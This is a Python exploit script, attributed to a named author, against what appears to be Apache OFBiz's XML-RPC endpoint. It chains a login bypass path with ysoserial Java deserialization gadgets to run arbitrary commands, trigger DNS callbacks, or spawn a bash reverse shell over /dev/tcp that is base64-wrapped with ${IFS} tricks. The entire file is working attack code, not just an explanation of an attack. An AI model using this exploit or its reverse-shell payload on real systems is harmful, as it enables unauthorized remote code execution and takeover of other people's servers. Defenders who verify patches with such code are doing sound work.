# This exploit has been written by Abdelhameed Ghazy
# Twitter : https://twitter.com/abd0ghazy
# https://www.linkedin.com/in/abdelhameed-ghazy-1a50b619a/
import requests, sys, subprocess,base64,urllib3,os
# Every request below is sent with verify=False (lab targets with self-signed
# certificates), so urllib3 would print an InsecureRequestWarning per call.
# Silencing it here also means nothing reminds you that TLS is unverified.
urllib3.disable_warnings(category=urllib3.exceptions.InsecureRequestWarning)
# Shared request headers: every payload is an XML-RPC body, so the content
# type is fixed once here and reused by rce() and dns().
headers = dict([("Content-Type", "application/xml")])
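def _ysoserial(gadget, arg):
    """Run the local ysoserial jar and return the raw serialized gadget bytes.

    Parameters:
        gadget: ysoserial payload name (``CommonsBeanutils1`` or ``URLDNS``).
        arg: payload argument, passed as its own argv element so it is never
            interpreted by a local shell; what it means is up to the gadget.

    The jar is loaded from the current directory and run unverified -- check
    the hash of the copy you downloaded against the release you took it from
    before pointing this tool at anything.  Exits with a hint about the tested
    JDK when java is missing or the jar fails, since nothing else here works
    without a payload.
    """
    try:
        return subprocess.check_output(
            ["java", "-jar", "ysoserial-all.jar", gadget, arg]
        )
    except (OSError, subprocess.CalledProcessError):
        # Narrowed from a bare ``except`` so Ctrl-C still interrupts the tool
        # instead of being reported as a java problem.
        sys.exit("""
Command didn't executed, please make sure you have java binary v11
this exploit tested on this env
openjdk version "11.0.17" 2022-10-18
OpenJDK Runtime Environment (build 11.0.17+8-post-Debian-2)
OpenJDK 64-Bit Server VM (build 11.0.17+8-post-Debian-2, mixed mode, sharing)
""")


def _xmlrpc_envelope(method_name, serialized):
    """Return an XML-RPC ``methodCall`` that carries *serialized* as a param.

    The bytes travel base64-encoded inside a ``<serializable>`` element of the
    Apache XML-RPC extensions namespace.  The method names used by the callers
    do not need to exist on the server: the expectation (confirm against the
    target) is that the object is deserialized while the params are parsed,
    before *method_name* is ever resolved.  The base64 alphabet contains no
    XML metacharacters, so no escaping is required.
    """
    return '''<?xml version="1.0"?>
<methodCall>
<methodName>%s</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>rce</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">
%s
</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
''' % (method_name, base64.b64encode(serialized).decode())


def _post_xmlrpc(url, xml_data, timeout):
    """POST *xml_data* to the target's XML-RPC handler and return the response.

    The ``;/`` after the servlet path together with the dummy USERNAME /
    PASSWORD / requirePasswordChange parameters are presumably what gets the
    request past the login check -- verify against the target version.
    ``verify=False`` is deliberate (self-signed lab certificates) but it also
    means anyone on the path can read or swap the request and response.
    A connection failure or timeout exits with a message instead of a
    traceback; the default is no longer an unbounded wait.
    """
    try:
        return requests.post(
            url + "webtools/control/xmlrpc;/?USERNAME=Y&PASSWORD=Y&requirePasswordChange=Y",
            data=xml_data,
            headers=headers,
            verify=False,
            timeout=timeout,
        )
    except requests.RequestException as exc:
        sys.exit("Request to %s failed: %s" % (url, exc))


def rce(url, arg, timeout=60):
    """Execute *arg* on the target via the CommonsBeanutils1 gadget chain.

    Parameters:
        url: target base URL ending in ``/`` (``main`` normalises this).
        arg: command string handed to the gadget verbatim; see ``shell`` for
            the ``${IFS}`` trick used when the command contains spaces.
        timeout: seconds to wait for the HTTP response (default 60).  A
            timeout exits non-zero, but a command that already ran on the
            target is not undone by it.

    The success message is a heuristic keyed on an InvocationTargetException
    appearing in the response body; confirm the effect out-of-band.
    """
    payload = _ysoserial("CommonsBeanutils1", arg)
    r = _post_xmlrpc(url, _xmlrpc_envelope("RCE-Test", payload), timeout)
    if "java.lang.reflect.InvocationTargetException" in r.text:
        print("Exploit Completed Successfully !")
    else:
        print("Not Sure Worked or not ")


def dns(url, arg, timeout=60):
    """Trigger a DNS lookup from the target with the URLDNS gadget.

    Parameters:
        url: target base URL ending in ``/``.
        arg: ``http(s)://`` URL whose hostname the target should resolve;
            point it at a DNS listener you control.
        timeout: seconds to wait for the HTTP response (default 60).

    Like ``rce``, the printed verdict is only a heuristic ("No such service"
    in the body); the authoritative signal is the lookup arriving at your
    listener.
    """
    payload = _ysoserial("URLDNS", arg)
    r = _post_xmlrpc(url, _xmlrpc_envelope("Dns", payload), timeout)
    if "No such service" in r.text:
        print("Exploit Completed Successfully !")
    else:
        print("Not Sure Worked or not ")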
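def shell(url, arg):
    """Spawn a bash reverse shell from the target back to ``ip:port``.

    Parameters:
        url: target base URL ending in ``/``.
        arg: listener address as ``ip:port``.  The host part is passed through
            untouched (a hostname works too); the port must be 1-65535.

    The one-liner is base64-wrapped and unpacked on the target with
    ``echo${IFS}...|base64${IFS}-d|bash``.  ``${IFS}`` stands in for the
    spaces inside the piped command so the whole thing stays a single token
    for whatever splits the command on whitespace before ``bash -c`` sees it.

    Only the address parsing is guarded: the former bare ``except`` also
    swallowed the ``SystemExit`` raised inside ``rce`` when java fails and
    replaced the real cause with a generic message.
    """
    parts = arg.split(":")
    try:
        ip = parts[0]
        port = int(parts[1])
    except (IndexError, ValueError):
        sys.exit("Please make sure from data")
    if not ip or not 0 < port < 65536:
        sys.exit("Please make sure from data")
    rev_shell_command = "bash -i >& /dev/tcp/{ip}/{port} 0>&1".format(ip=ip, port=port)
    encoded_rev_shell_command = base64.b64encode(rev_shell_command.encode()).decode()
    rev_shell1 = 'bash -c echo${IFS}%s|base64${IFS}-d|bash' % encoded_rev_shell_command
    # Runs outside the try so a failure inside rce() reports its own message.
    rce(url, rev_shell1)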
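def main():
    """Command-line entry point: ``exploit.py target_url <rce|dns|shell> arg``.

    Validates argument count, the presence of ``ysoserial-all.jar`` in the
    current directory (the same relative path the java call uses), and that
    the target URL is http(s); then dispatches on the action.  The jar is run
    as-is, so make sure the copy in this directory is the one you intended.
    """
    usage = """
Usage:
python3 exploit.py target_url rce command
python3 exploit.py target_url dns dns_url
python3 exploit.py target_url shell ip:port
"""
    if len(sys.argv) < 4:
        sys.exit(usage)
    if not os.path.exists("ysoserial-all.jar"):
        sys.exit("ysoserial-all.jar file must be in the same directory")
    target_url, action, arg = sys.argv[1:4]
    if not target_url.endswith("/"):
        target_url += "/"
    if not target_url.startswith(("http://", "https://")):
        sys.exit("""
Please Enter a Valid target_url
Ex: https://example.com
""")
    if action == "rce":
        rce(target_url, arg)
    elif action == "dns":
        # URLDNS wants a URL, not a bare hostname.
        if not arg.startswith(("http://", "https://")):
            sys.exit("""
Please Enter a Valid dns url
Ex: https://example.com
""")
        dns(target_url, arg)
    elif action == "shell":
        shell(target_url, arg)
    else:
        sys.exit(usage)


if __name__ == "__main__":
    main()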